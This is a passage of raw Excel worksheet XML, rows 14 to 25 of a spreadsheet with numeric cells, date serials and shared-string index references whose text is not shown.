        <v>0</v>
      </c>
      <c r="AF14" t="s">
        <v>183</v>
      </c>
      <c r="AG14">
        <v>14440</v>
      </c>
      <c r="AH14">
        <v>12</v>
      </c>
      <c r="AJ14">
        <v>160</v>
      </c>
      <c r="AK14" t="s">
        <v>114</v>
      </c>
      <c r="AL14" t="s">
        <v>114</v>
      </c>
      <c r="AM14" t="s">
        <v>184</v>
      </c>
      <c r="AN14" t="s">
        <v>68</v>
      </c>
      <c r="AO14">
        <v>2015</v>
      </c>
      <c r="AP14">
        <v>2154373279</v>
      </c>
      <c r="AQ14" t="s">
        <v>185</v>
      </c>
      <c r="AR14" t="s">
        <v>186</v>
      </c>
      <c r="AS14" t="s">
        <v>187</v>
      </c>
      <c r="AT14" t="s">
        <v>58</v>
      </c>
      <c r="AU14">
        <v>27</v>
      </c>
      <c r="AV14">
        <v>0</v>
      </c>
      <c r="AW14">
        <v>5</v>
      </c>
      <c r="AX14">
        <v>0</v>
      </c>
      <c r="AY14">
        <v>4</v>
      </c>
      <c r="AZ14">
        <v>0</v>
      </c>
      <c r="BA14" t="s">
        <v>17157</v>
      </c>
      <c r="BB14" t="s">
        <v>14684</v>
      </c>
      <c r="BC14" t="s">
        <v>9550</v>
      </c>
      <c r="BD14" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="15" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>206</v>
      </c>
      <c r="B15" t="s">
        <v>188</v>
      </c>
      <c r="C15" t="s">
        <v>189</v>
      </c>
      <c r="D15" t="s">
        <v>190</v>
      </c>
      <c r="E15" t="s">
        <v>142</v>
      </c>
      <c r="F15" t="s">
        <v>191</v>
      </c>
      <c r="G15" s="1">
        <v>43986</v>
      </c>
      <c r="H15">
        <v>281</v>
      </c>
      <c r="I15">
        <v>281</v>
      </c>
      <c r="J15">
        <v>4</v>
      </c>
      <c r="K15">
        <v>0</v>
      </c>
      <c r="L15">
        <v>4</v>
      </c>
      <c r="M15">
        <v>0</v>
      </c>
      <c r="N15">
        <v>0</v>
      </c>
      <c r="O15">
        <v>0</v>
      </c>
      <c r="P15">
        <v>0</v>
      </c>
      <c r="Q15">
        <v>2</v>
      </c>
      <c r="R15">
        <v>4</v>
      </c>
      <c r="S15">
        <v>0</v>
      </c>
      <c r="T15">
        <v>2</v>
      </c>
      <c r="U15">
        <v>9000000</v>
      </c>
      <c r="V15">
        <v>0</v>
      </c>
      <c r="W15">
        <v>50000</v>
      </c>
      <c r="X15">
        <v>0</v>
      </c>
      <c r="Y15">
        <v>0</v>
      </c>
      <c r="Z15">
        <v>0</v>
      </c>
      <c r="AA15">
        <v>0</v>
      </c>
      <c r="AB15">
        <v>1000</v>
      </c>
      <c r="AC15">
        <v>20000</v>
      </c>
      <c r="AD15">
        <v>0</v>
      </c>
      <c r="AE15">
        <v>0</v>
      </c>
      <c r="AF15" t="s">
        <v>192</v>
      </c>
      <c r="AG15">
        <v>97611</v>
      </c>
      <c r="AH15">
        <v>31</v>
      </c>
      <c r="AJ15">
        <v>462</v>
      </c>
      <c r="AK15" t="s">
        <v>193</v>
      </c>
      <c r="AL15" t="s">
        <v>194</v>
      </c>
      <c r="AM15" t="s">
        <v>195</v>
      </c>
      <c r="AN15" t="s">
        <v>55</v>
      </c>
      <c r="AO15">
        <v>2016</v>
      </c>
      <c r="AP15">
        <v>81343337091</v>
      </c>
      <c r="AQ15" t="s">
        <v>196</v>
      </c>
      <c r="AR15" t="s">
        <v>197</v>
      </c>
      <c r="AS15" t="s">
        <v>71</v>
      </c>
      <c r="AT15" t="s">
        <v>58</v>
      </c>
      <c r="AU15">
        <v>25</v>
      </c>
      <c r="AV15">
        <v>2</v>
      </c>
      <c r="AW15">
        <v>36</v>
      </c>
      <c r="AX15">
        <v>22</v>
      </c>
      <c r="AY15">
        <v>12</v>
      </c>
      <c r="AZ15">
        <v>9</v>
      </c>
      <c r="BA15" t="s">
        <v>17155</v>
      </c>
      <c r="BB15" t="s">
        <v>14383</v>
      </c>
      <c r="BC15" t="s">
        <v>9693</v>
      </c>
      <c r="BD15" t="s">
        <v>10353</v>
      </c>
    </row>
    <row r="16" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>686</v>
      </c>
      <c r="B16" t="s">
        <v>198</v>
      </c>
      <c r="C16" t="s">
        <v>199</v>
      </c>
      <c r="D16" t="s">
        <v>200</v>
      </c>
      <c r="E16" t="s">
        <v>111</v>
      </c>
      <c r="F16" t="s">
        <v>201</v>
      </c>
      <c r="G16" s="1">
        <v>43871</v>
      </c>
      <c r="H16">
        <v>295</v>
      </c>
      <c r="I16">
        <v>295</v>
      </c>
      <c r="J16">
        <v>1</v>
      </c>
      <c r="K16">
        <v>0</v>
      </c>
      <c r="L16">
        <v>2</v>
      </c>
      <c r="M16">
        <v>0</v>
      </c>
      <c r="N16">
        <v>0</v>
      </c>
      <c r="O16">
        <v>0</v>
      </c>
      <c r="P16">
        <v>0</v>
      </c>
      <c r="Q16">
        <v>5</v>
      </c>
      <c r="R16">
        <v>3</v>
      </c>
      <c r="S16">
        <v>0</v>
      </c>
      <c r="T16">
        <v>1</v>
      </c>
      <c r="U16">
        <v>60</v>
      </c>
      <c r="V16">
        <v>0</v>
      </c>
      <c r="W16">
        <v>4</v>
      </c>
      <c r="X16">
        <v>0</v>
      </c>
      <c r="Y16">
        <v>0</v>
      </c>
      <c r="Z16">
        <v>0</v>
      </c>
      <c r="AA16">
        <v>0</v>
      </c>
      <c r="AB16">
        <v>2</v>
      </c>
      <c r="AC16">
        <v>4</v>
      </c>
      <c r="AD16">
        <v>0</v>
      </c>
      <c r="AE16">
        <v>4</v>
      </c>
      <c r="AF16" t="s">
        <v>202</v>
      </c>
      <c r="AG16">
        <v>0</v>
      </c>
      <c r="AH16">
        <v>1</v>
      </c>
      <c r="AJ16">
        <v>19</v>
      </c>
      <c r="AK16" t="s">
        <v>203</v>
      </c>
      <c r="AL16" t="s">
        <v>204</v>
      </c>
      <c r="AM16" t="s">
        <v>205</v>
      </c>
      <c r="AN16" t="s">
        <v>55</v>
      </c>
      <c r="AO16">
        <v>2013</v>
      </c>
      <c r="AP16">
        <v>82364636000</v>
      </c>
      <c r="AQ16" t="s">
        <v>202</v>
      </c>
      <c r="AR16" t="s">
        <v>202</v>
      </c>
      <c r="AS16" t="s">
        <v>71</v>
      </c>
      <c r="AT16" t="s">
        <v>58</v>
      </c>
      <c r="AU16">
        <v>0</v>
      </c>
      <c r="AV16">
        <v>0</v>
      </c>
      <c r="AW16">
        <v>0</v>
      </c>
      <c r="AX16">
        <v>0</v>
      </c>
      <c r="AY16">
        <v>7</v>
      </c>
      <c r="AZ16">
        <v>1</v>
      </c>
      <c r="BA16" t="s">
        <v>16736</v>
      </c>
      <c r="BB16" t="s">
        <v>14776</v>
      </c>
      <c r="BC16" t="s">
        <v>10141</v>
      </c>
      <c r="BD16" t="s">
        <v>10148</v>
      </c>
    </row>
    <row r="17" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>433</v>
      </c>
      <c r="B17" t="s">
        <v>206</v>
      </c>
      <c r="C17" t="s">
        <v>157</v>
      </c>
      <c r="D17" t="s">
        <v>207</v>
      </c>
      <c r="E17" t="s">
        <v>142</v>
      </c>
      <c r="F17" t="s">
        <v>208</v>
      </c>
      <c r="G17" s="1">
        <v>43929</v>
      </c>
      <c r="H17">
        <v>358</v>
      </c>
      <c r="I17">
        <v>358</v>
      </c>
      <c r="J17">
        <v>2</v>
      </c>
      <c r="K17">
        <v>0</v>
      </c>
      <c r="L17">
        <v>2</v>
      </c>
      <c r="M17">
        <v>0</v>
      </c>
      <c r="N17">
        <v>0</v>
      </c>
      <c r="O17">
        <v>0</v>
      </c>
      <c r="P17">
        <v>0</v>
      </c>
      <c r="Q17">
        <v>1</v>
      </c>
      <c r="R17">
        <v>0</v>
      </c>
      <c r="S17">
        <v>0</v>
      </c>
      <c r="T17">
        <v>1</v>
      </c>
      <c r="U17">
        <v>2000</v>
      </c>
      <c r="V17">
        <v>0</v>
      </c>
      <c r="W17">
        <v>2000</v>
      </c>
      <c r="X17">
        <v>0</v>
      </c>
      <c r="Y17">
        <v>0</v>
      </c>
      <c r="Z17">
        <v>0</v>
      </c>
      <c r="AA17">
        <v>0</v>
      </c>
      <c r="AB17">
        <v>500</v>
      </c>
      <c r="AC17">
        <v>0</v>
      </c>
      <c r="AD17">
        <v>0</v>
      </c>
      <c r="AE17">
        <v>1000</v>
      </c>
      <c r="AF17" t="s">
        <v>209</v>
      </c>
      <c r="AG17">
        <v>60182</v>
      </c>
      <c r="AH17">
        <v>16</v>
      </c>
      <c r="AJ17">
        <v>264</v>
      </c>
      <c r="AK17" t="s">
        <v>210</v>
      </c>
      <c r="AL17" t="s">
        <v>211</v>
      </c>
      <c r="AM17" t="s">
        <v>212</v>
      </c>
      <c r="AN17" t="s">
        <v>55</v>
      </c>
      <c r="AO17">
        <v>2001</v>
      </c>
      <c r="AP17">
        <v>317496132</v>
      </c>
      <c r="AQ17" t="s">
        <v>213</v>
      </c>
      <c r="AR17" t="s">
        <v>209</v>
      </c>
      <c r="AS17" t="s">
        <v>71</v>
      </c>
      <c r="AT17" t="s">
        <v>58</v>
      </c>
      <c r="AU17">
        <v>25</v>
      </c>
      <c r="AV17">
        <v>1</v>
      </c>
      <c r="AW17">
        <v>5</v>
      </c>
      <c r="AX17">
        <v>4</v>
      </c>
      <c r="AY17">
        <v>3</v>
      </c>
      <c r="AZ17">
        <v>3</v>
      </c>
      <c r="BA17" t="s">
        <v>16688</v>
      </c>
      <c r="BB17" t="s">
        <v>14569</v>
      </c>
      <c r="BC17" t="s">
        <v>9884</v>
      </c>
      <c r="BD17">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A18">
        <v>775</v>
      </c>
      <c r="B18" t="s">
        <v>214</v>
      </c>
      <c r="C18" t="s">
        <v>215</v>
      </c>
      <c r="D18" t="s">
        <v>216</v>
      </c>
      <c r="E18" t="s">
        <v>142</v>
      </c>
      <c r="F18" t="s">
        <v>217</v>
      </c>
      <c r="G18" s="1">
        <v>43900</v>
      </c>
      <c r="H18">
        <v>362</v>
      </c>
      <c r="I18">
        <v>362</v>
      </c>
      <c r="J18">
        <v>1</v>
      </c>
      <c r="K18">
        <v>0</v>
      </c>
      <c r="L18">
        <v>5</v>
      </c>
      <c r="M18">
        <v>0</v>
      </c>
      <c r="N18">
        <v>0</v>
      </c>
      <c r="O18">
        <v>0</v>
      </c>
      <c r="P18">
        <v>0</v>
      </c>
      <c r="Q18">
        <v>0</v>
      </c>
      <c r="R18">
        <v>1</v>
      </c>
      <c r="S18">
        <v>0</v>
      </c>
      <c r="T18">
        <v>0</v>
      </c>
      <c r="U18">
        <v>50000</v>
      </c>
      <c r="V18">
        <v>0</v>
      </c>
      <c r="W18">
        <v>1500</v>
      </c>
      <c r="X18">
        <v>0</v>
      </c>
      <c r="Y18">
        <v>0</v>
      </c>
      <c r="Z18">
        <v>0</v>
      </c>
      <c r="AA18">
        <v>0</v>
      </c>
      <c r="AB18">
        <v>0</v>
      </c>
      <c r="AC18">
        <v>30000</v>
      </c>
      <c r="AD18">
        <v>0</v>
      </c>
      <c r="AE18">
        <v>0</v>
      </c>
      <c r="AF18" t="s">
        <v>218</v>
      </c>
      <c r="AG18">
        <v>33411</v>
      </c>
      <c r="AH18">
        <v>6</v>
      </c>
      <c r="AJ18">
        <v>142</v>
      </c>
      <c r="AK18" t="s">
        <v>219</v>
      </c>
      <c r="AL18" t="s">
        <v>220</v>
      </c>
      <c r="AM18" t="s">
        <v>221</v>
      </c>
      <c r="AN18" t="s">
        <v>55</v>
      </c>
      <c r="AO18">
        <v>2013</v>
      </c>
      <c r="AP18">
        <v>8127175184</v>
      </c>
      <c r="AQ18" t="s">
        <v>222</v>
      </c>
      <c r="AR18" t="s">
        <v>218</v>
      </c>
      <c r="AS18" t="s">
        <v>71</v>
      </c>
      <c r="AT18" t="s">
        <v>58</v>
      </c>
      <c r="AU18">
        <v>6</v>
      </c>
      <c r="AV18">
        <v>1</v>
      </c>
      <c r="AW18">
        <v>9</v>
      </c>
      <c r="AX18">
        <v>30</v>
      </c>
      <c r="AY18">
        <v>30</v>
      </c>
      <c r="AZ18">
        <v>21</v>
      </c>
      <c r="BA18" t="s">
        <v>16756</v>
      </c>
      <c r="BB18" t="s">
        <v>14846</v>
      </c>
      <c r="BC18" t="s">
        <v>9550</v>
      </c>
      <c r="BD18" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="19" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A19">
        <v>454</v>
      </c>
      <c r="B19" t="s">
        <v>223</v>
      </c>
      <c r="C19" t="s">
        <v>224</v>
      </c>
      <c r="D19" t="s">
        <v>225</v>
      </c>
      <c r="E19" t="s">
        <v>49</v>
      </c>
      <c r="F19" t="s">
        <v>226</v>
      </c>
      <c r="G19" s="1">
        <v>44055</v>
      </c>
      <c r="H19">
        <v>427</v>
      </c>
      <c r="I19">
        <v>427</v>
      </c>
      <c r="J19">
        <v>0</v>
      </c>
      <c r="K19">
        <v>0</v>
      </c>
      <c r="L19">
        <v>0</v>
      </c>
      <c r="M19">
        <v>0</v>
      </c>
      <c r="N19">
        <v>0</v>
      </c>
      <c r="O19">
        <v>0</v>
      </c>
      <c r="P19">
        <v>0</v>
      </c>
      <c r="Q19">
        <v>1</v>
      </c>
      <c r="R19">
        <v>3</v>
      </c>
      <c r="S19">
        <v>0</v>
      </c>
      <c r="T19">
        <v>3</v>
      </c>
      <c r="U19">
        <v>0</v>
      </c>
      <c r="V19">
        <v>0</v>
      </c>
      <c r="W19">
        <v>0</v>
      </c>
      <c r="X19">
        <v>0</v>
      </c>
      <c r="Y19">
        <v>0</v>
      </c>
      <c r="Z19">
        <v>0</v>
      </c>
      <c r="AA19">
        <v>0</v>
      </c>
      <c r="AB19">
        <v>50</v>
      </c>
      <c r="AC19">
        <v>1000</v>
      </c>
      <c r="AD19">
        <v>0</v>
      </c>
      <c r="AE19">
        <v>1200</v>
      </c>
      <c r="AF19" t="s">
        <v>227</v>
      </c>
      <c r="AG19">
        <v>55561</v>
      </c>
      <c r="AH19">
        <v>15</v>
      </c>
      <c r="AJ19">
        <v>226</v>
      </c>
      <c r="AK19" t="s">
        <v>228</v>
      </c>
      <c r="AL19" t="s">
        <v>229</v>
      </c>
      <c r="AM19" t="s">
        <v>230</v>
      </c>
      <c r="AN19" t="s">
        <v>68</v>
      </c>
      <c r="AO19">
        <v>2001</v>
      </c>
      <c r="AP19">
        <v>81328002423</v>
      </c>
      <c r="AQ19" t="s">
        <v>231</v>
      </c>
      <c r="AR19" t="s">
        <v>232</v>
      </c>
      <c r="AS19" t="s">
        <v>71</v>
      </c>
      <c r="AT19" t="s">
        <v>72</v>
      </c>
      <c r="AU19">
        <v>6</v>
      </c>
      <c r="AV19">
        <v>1</v>
      </c>
      <c r="AW19">
        <v>5</v>
      </c>
      <c r="AX19">
        <v>6</v>
      </c>
      <c r="AY19">
        <v>0</v>
      </c>
      <c r="AZ19">
        <v>1</v>
      </c>
      <c r="BA19" t="s">
        <v>16696</v>
      </c>
      <c r="BB19" t="s">
        <v>14588</v>
      </c>
      <c r="BC19" t="s">
        <v>11156</v>
      </c>
      <c r="BD19">
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A20">
        <v>360</v>
      </c>
      <c r="B20" t="s">
        <v>233</v>
      </c>
      <c r="C20" t="s">
        <v>99</v>
      </c>
      <c r="D20" t="s">
        <v>234</v>
      </c>
      <c r="E20" t="s">
        <v>142</v>
      </c>
      <c r="F20" t="s">
        <v>235</v>
      </c>
      <c r="G20" s="1">
        <v>43873</v>
      </c>
      <c r="H20">
        <v>428</v>
      </c>
      <c r="I20">
        <v>428</v>
      </c>
      <c r="J20">
        <v>5</v>
      </c>
      <c r="K20">
        <v>0</v>
      </c>
      <c r="L20">
        <v>1</v>
      </c>
      <c r="M20">
        <v>0</v>
      </c>
      <c r="N20">
        <v>0</v>
      </c>
      <c r="O20">
        <v>0</v>
      </c>
      <c r="P20">
        <v>0</v>
      </c>
      <c r="Q20">
        <v>0</v>
      </c>
      <c r="R20">
        <v>0</v>
      </c>
      <c r="S20">
        <v>1</v>
      </c>
      <c r="T20">
        <v>0</v>
      </c>
      <c r="U20">
        <v>100000000</v>
      </c>
      <c r="V20">
        <v>0</v>
      </c>
      <c r="W20">
        <v>5000</v>
      </c>
      <c r="X20">
        <v>0</v>
      </c>
      <c r="Y20">
        <v>0</v>
      </c>
      <c r="Z20">
        <v>0</v>
      </c>
      <c r="AA20">
        <v>0</v>
      </c>
      <c r="AB20">
        <v>0</v>
      </c>
      <c r="AC20">
        <v>0</v>
      </c>
      <c r="AD20">
        <v>1</v>
      </c>
      <c r="AE20">
        <v>0</v>
      </c>
      <c r="AF20" t="s">
        <v>236</v>
      </c>
      <c r="AG20">
        <v>14440</v>
      </c>
      <c r="AH20">
        <v>12</v>
      </c>
      <c r="AJ20">
        <v>160</v>
      </c>
      <c r="AK20" t="s">
        <v>114</v>
      </c>
      <c r="AL20" t="s">
        <v>114</v>
      </c>
      <c r="AM20" t="s">
        <v>237</v>
      </c>
      <c r="AN20" t="s">
        <v>55</v>
      </c>
      <c r="AO20">
        <v>2013</v>
      </c>
      <c r="AP20" t="s">
        <v>238</v>
      </c>
      <c r="AQ20" t="s">
        <v>239</v>
      </c>
      <c r="AR20" t="s">
        <v>236</v>
      </c>
      <c r="AS20" t="s">
        <v>71</v>
      </c>
      <c r="AT20" t="s">
        <v>58</v>
      </c>
      <c r="AU20">
        <v>26</v>
      </c>
      <c r="AV20">
        <v>0</v>
      </c>
      <c r="AW20">
        <v>35</v>
      </c>
      <c r="AX20">
        <v>5</v>
      </c>
      <c r="AY20">
        <v>9</v>
      </c>
      <c r="AZ20">
        <v>14</v>
      </c>
      <c r="BA20" t="s">
        <v>16670</v>
      </c>
      <c r="BB20" t="s">
        <v>14510</v>
      </c>
      <c r="BC20">
        <v>0</v>
      </c>
      <c r="BD20">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A21">
        <v>465</v>
      </c>
      <c r="B21" t="s">
        <v>240</v>
      </c>
      <c r="C21" t="s">
        <v>74</v>
      </c>
      <c r="D21" t="s">
        <v>241</v>
      </c>
      <c r="E21" t="s">
        <v>242</v>
      </c>
      <c r="F21" t="s">
        <v>243</v>
      </c>
      <c r="G21" s="1">
        <v>44265</v>
      </c>
      <c r="H21">
        <v>438</v>
      </c>
      <c r="I21">
        <v>438</v>
      </c>
      <c r="J21">
        <v>1</v>
      </c>
      <c r="K21">
        <v>1</v>
      </c>
      <c r="L21">
        <v>0</v>
      </c>
      <c r="M21">
        <v>1</v>
      </c>
      <c r="N21">
        <v>0</v>
      </c>
      <c r="O21">
        <v>0</v>
      </c>
      <c r="P21">
        <v>5</v>
      </c>
      <c r="Q21">
        <v>0</v>
      </c>
      <c r="R21">
        <v>0</v>
      </c>
      <c r="S21">
        <v>3</v>
      </c>
      <c r="T21">
        <v>1</v>
      </c>
      <c r="U21">
        <v>75000</v>
      </c>
      <c r="V21">
        <v>150000</v>
      </c>
      <c r="W21">
        <v>0</v>
      </c>
      <c r="X21">
        <v>500</v>
      </c>
      <c r="Y21">
        <v>0</v>
      </c>
      <c r="Z21">
        <v>0</v>
      </c>
      <c r="AA21">
        <v>2000</v>
      </c>
      <c r="AB21">
        <v>0</v>
      </c>
      <c r="AC21">
        <v>0</v>
      </c>
      <c r="AD21">
        <v>2000</v>
      </c>
      <c r="AE21">
        <v>0</v>
      </c>
      <c r="AF21" t="s">
        <v>244</v>
      </c>
      <c r="AG21">
        <v>59581</v>
      </c>
      <c r="AH21">
        <v>14</v>
      </c>
      <c r="AJ21">
        <v>208</v>
      </c>
      <c r="AK21" t="s">
        <v>245</v>
      </c>
      <c r="AL21" t="s">
        <v>245</v>
      </c>
      <c r="AM21" t="s">
        <v>246</v>
      </c>
      <c r="AN21" t="s">
        <v>55</v>
      </c>
      <c r="AO21">
        <v>2018</v>
      </c>
      <c r="AP21" t="s">
        <v>247</v>
      </c>
      <c r="AQ21">
        <v>85267665221</v>
      </c>
      <c r="AR21" t="s">
        <v>244</v>
      </c>
      <c r="AS21" t="s">
        <v>71</v>
      </c>
      <c r="AT21" t="s">
        <v>58</v>
      </c>
      <c r="AU21">
        <v>26</v>
      </c>
      <c r="AV21">
        <v>1</v>
      </c>
      <c r="AW21">
        <v>15</v>
      </c>
      <c r="AX21">
        <v>110</v>
      </c>
      <c r="AY21">
        <v>8</v>
      </c>
      <c r="AZ21">
        <v>17</v>
      </c>
      <c r="BA21" t="s">
        <v>16701</v>
      </c>
      <c r="BB21" t="s">
        <v>14596</v>
      </c>
      <c r="BC21">
        <v>0</v>
      </c>
      <c r="BD21" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="22" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A22">
        <v>325</v>
      </c>
      <c r="B22" t="s">
        <v>248</v>
      </c>
      <c r="C22" t="s">
        <v>129</v>
      </c>
      <c r="D22" t="s">
        <v>249</v>
      </c>
      <c r="E22" t="s">
        <v>142</v>
      </c>
      <c r="F22" t="s">
        <v>250</v>
      </c>
      <c r="G22" s="1">
        <v>43847</v>
      </c>
      <c r="H22">
        <v>498</v>
      </c>
      <c r="I22">
        <v>498</v>
      </c>
      <c r="J22">
        <v>2</v>
      </c>
      <c r="K22">
        <v>0</v>
      </c>
      <c r="L22">
        <v>1</v>
      </c>
      <c r="M22">
        <v>0</v>
      </c>
      <c r="N22">
        <v>0</v>
      </c>
      <c r="O22">
        <v>0</v>
      </c>
      <c r="P22">
        <v>0</v>
      </c>
      <c r="Q22">
        <v>0</v>
      </c>
      <c r="R22">
        <v>0</v>
      </c>
      <c r="S22">
        <v>1</v>
      </c>
      <c r="T22">
        <v>0</v>
      </c>
      <c r="U22">
        <v>700000</v>
      </c>
      <c r="V22">
        <v>0</v>
      </c>
      <c r="W22">
        <v>14000</v>
      </c>
      <c r="X22">
        <v>0</v>
      </c>
      <c r="Y22">
        <v>0</v>
      </c>
      <c r="Z22">
        <v>0</v>
      </c>
      <c r="AA22">
        <v>0</v>
      </c>
      <c r="AB22">
        <v>0</v>
      </c>
      <c r="AC22">
        <v>0</v>
      </c>
      <c r="AD22">
        <v>1</v>
      </c>
      <c r="AE22">
        <v>0</v>
      </c>
      <c r="AF22" t="s">
        <v>251</v>
      </c>
      <c r="AG22">
        <v>15211</v>
      </c>
      <c r="AH22">
        <v>11</v>
      </c>
      <c r="AJ22">
        <v>268</v>
      </c>
      <c r="AK22" t="s">
        <v>252</v>
      </c>
      <c r="AL22" t="s">
        <v>253</v>
      </c>
      <c r="AM22" t="s">
        <v>254</v>
      </c>
      <c r="AN22" t="s">
        <v>68</v>
      </c>
      <c r="AO22">
        <v>2017</v>
      </c>
      <c r="AP22" t="s">
        <v>255</v>
      </c>
      <c r="AQ22" t="s">
        <v>256</v>
      </c>
      <c r="AR22" t="s">
        <v>257</v>
      </c>
      <c r="AS22" t="s">
        <v>187</v>
      </c>
      <c r="AT22" t="s">
        <v>72</v>
      </c>
      <c r="AU22">
        <v>27</v>
      </c>
      <c r="AV22">
        <v>0</v>
      </c>
      <c r="AW22">
        <v>0</v>
      </c>
      <c r="AX22">
        <v>0</v>
      </c>
      <c r="AY22">
        <v>15</v>
      </c>
      <c r="AZ22">
        <v>4</v>
      </c>
      <c r="BA22" t="s">
        <v>16634</v>
      </c>
      <c r="BB22" t="s">
        <v>14372</v>
      </c>
      <c r="BC22" t="s">
        <v>9933</v>
      </c>
      <c r="BD22" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="23" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A23">
        <v>324</v>
      </c>
      <c r="B23" t="s">
        <v>258</v>
      </c>
      <c r="C23" t="s">
        <v>129</v>
      </c>
      <c r="D23" t="s">
        <v>259</v>
      </c>
      <c r="E23" t="s">
        <v>142</v>
      </c>
      <c r="F23" t="s">
        <v>260</v>
      </c>
      <c r="G23" s="1">
        <v>43847</v>
      </c>
      <c r="H23">
        <v>590</v>
      </c>
      <c r="I23">
        <v>590</v>
      </c>
      <c r="J23">
        <v>2</v>
      </c>
      <c r="K23">
        <v>0</v>
      </c>
      <c r="L23">
        <v>1</v>
      </c>
      <c r="M23">
        <v>0</v>
      </c>
      <c r="N23">
        <v>0</v>
      </c>
      <c r="O23">
        <v>0</v>
      </c>
      <c r="P23">
        <v>0</v>
      </c>
      <c r="Q23">
        <v>0</v>
      </c>
      <c r="R23">
        <v>0</v>
      </c>
      <c r="S23">
        <v>1</v>
      </c>
      <c r="T23">
        <v>0</v>
      </c>
      <c r="U23">
        <v>700000</v>
      </c>
      <c r="V23">
        <v>0</v>
      </c>
      <c r="W23">
        <v>14000</v>
      </c>
      <c r="X23">
        <v>0</v>
      </c>
      <c r="Y23">
        <v>0</v>
      </c>
      <c r="Z23">
        <v>0</v>
      </c>
      <c r="AA23">
        <v>0</v>
      </c>
      <c r="AB23">
        <v>0</v>
      </c>
      <c r="AC23">
        <v>0</v>
      </c>
      <c r="AD23">
        <v>1</v>
      </c>
      <c r="AE23">
        <v>0</v>
      </c>
      <c r="AF23" t="s">
        <v>251</v>
      </c>
      <c r="AG23">
        <v>15211</v>
      </c>
      <c r="AH23">
        <v>11</v>
      </c>
      <c r="AJ23">
        <v>268</v>
      </c>
      <c r="AK23" t="s">
        <v>252</v>
      </c>
      <c r="AL23" t="s">
        <v>174</v>
      </c>
      <c r="AM23" t="s">
        <v>261</v>
      </c>
      <c r="AN23" t="s">
        <v>55</v>
      </c>
      <c r="AO23">
        <v>2017</v>
      </c>
      <c r="AP23" t="s">
        <v>255</v>
      </c>
      <c r="AQ23" t="s">
        <v>262</v>
      </c>
      <c r="AR23" t="s">
        <v>263</v>
      </c>
      <c r="AS23" t="s">
        <v>187</v>
      </c>
      <c r="AT23" t="s">
        <v>86</v>
      </c>
      <c r="AU23">
        <v>27</v>
      </c>
      <c r="AV23">
        <v>0</v>
      </c>
      <c r="AW23">
        <v>0</v>
      </c>
      <c r="AX23">
        <v>0</v>
      </c>
      <c r="AY23">
        <v>10</v>
      </c>
      <c r="AZ23">
        <v>3</v>
      </c>
      <c r="BA23" t="s">
        <v>17171</v>
      </c>
      <c r="BB23" t="s">
        <v>14483</v>
      </c>
      <c r="BC23" t="s">
        <v>9933</v>
      </c>
      <c r="BD23" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="24" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A24">
        <v>133</v>
      </c>
      <c r="B24" t="s">
        <v>264</v>
      </c>
      <c r="C24" t="s">
        <v>99</v>
      </c>
      <c r="D24" t="s">
        <v>265</v>
      </c>
      <c r="E24" t="s">
        <v>142</v>
      </c>
      <c r="F24" t="s">
        <v>266</v>
      </c>
      <c r="G24" s="1">
        <v>44305</v>
      </c>
      <c r="H24">
        <v>654</v>
      </c>
      <c r="I24">
        <v>654</v>
      </c>
      <c r="J24">
        <v>2</v>
      </c>
      <c r="K24">
        <v>0</v>
      </c>
      <c r="L24">
        <v>2</v>
      </c>
      <c r="M24">
        <v>0</v>
      </c>
      <c r="N24">
        <v>0</v>
      </c>
      <c r="O24">
        <v>0</v>
      </c>
      <c r="P24">
        <v>0</v>
      </c>
      <c r="Q24">
        <v>0</v>
      </c>
      <c r="R24">
        <v>0</v>
      </c>
      <c r="S24">
        <v>0</v>
      </c>
      <c r="T24">
        <v>1</v>
      </c>
      <c r="U24">
        <v>500000</v>
      </c>
      <c r="V24">
        <v>0</v>
      </c>
      <c r="W24">
        <v>5000</v>
      </c>
      <c r="X24">
        <v>0</v>
      </c>
      <c r="Y24">
        <v>0</v>
      </c>
      <c r="Z24">
        <v>0</v>
      </c>
      <c r="AA24">
        <v>0</v>
      </c>
      <c r="AB24">
        <v>0</v>
      </c>
      <c r="AC24">
        <v>0</v>
      </c>
      <c r="AD24">
        <v>0</v>
      </c>
      <c r="AE24">
        <v>100000</v>
      </c>
      <c r="AF24" t="s">
        <v>267</v>
      </c>
      <c r="AG24">
        <v>14310</v>
      </c>
      <c r="AH24">
        <v>12</v>
      </c>
      <c r="AJ24">
        <v>160</v>
      </c>
      <c r="AK24" t="s">
        <v>268</v>
      </c>
      <c r="AL24" t="s">
        <v>268</v>
      </c>
      <c r="AM24" t="s">
        <v>269</v>
      </c>
      <c r="AN24" t="s">
        <v>55</v>
      </c>
      <c r="AO24">
        <v>2008</v>
      </c>
      <c r="AP24" t="s">
        <v>270</v>
      </c>
      <c r="AQ24" t="s">
        <v>271</v>
      </c>
      <c r="AR24" t="s">
        <v>267</v>
      </c>
      <c r="AS24" t="s">
        <v>71</v>
      </c>
      <c r="AT24" t="s">
        <v>58</v>
      </c>
      <c r="AU24">
        <v>24</v>
      </c>
      <c r="AV24">
        <v>0</v>
      </c>
      <c r="AW24">
        <v>6</v>
      </c>
      <c r="AX24">
        <v>0</v>
      </c>
      <c r="AY24">
        <v>16</v>
      </c>
      <c r="AZ24">
        <v>115</v>
      </c>
      <c r="BA24" t="s">
        <v>16618</v>
      </c>
      <c r="BB24" t="s">
        <v>14327</v>
      </c>
      <c r="BC24">
        <v>0</v>
      </c>
      <c r="BD24">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A25">
        <v>455</v>
      </c>
      <c r="B25" t="s">
        <v>272</v>
      </c>
      <c r="C25" t="s">
        <v>129</v>
      </c>
      <c r="D25" t="s">
        <v>273</v>
      </c>
